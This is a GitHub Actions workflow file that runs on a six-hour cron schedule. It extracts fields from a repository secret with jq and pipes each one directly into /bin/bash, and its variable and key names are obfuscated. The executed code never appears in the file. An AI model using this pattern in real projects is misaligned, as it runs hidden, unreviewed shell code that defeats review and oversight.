name: shangbaiyineng
on:
  workflow_dispatch:
  schedule:
    - cron: '30 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: shangbaiyineng
        env:
          lra285: ${{ secrets.lra285 }}
        run: |
          echo $lra285 | jq -r .e6 | /bin/bash
          echo $qpq2 | jq -r .d68484 | /bin/bash
          echo $ao76 | jq -r .jeig908 | /bin/bash
          echo $dhv8 | jq -r .hcoml0626 | /bin/bash
          echo $fgcl99448 | jq -r .f0747 | /bin/bash
          echo $d65 | jq -r .jq7000 | /bin/bash
          echo $zjk0 | jq -r .kdeu2 | /bin/bash
          echo $emp0718 | jq -r .hxdi18 | /bin/bash
          echo $dtxn9558 | jq -r .gwu4779 | /bin/bash

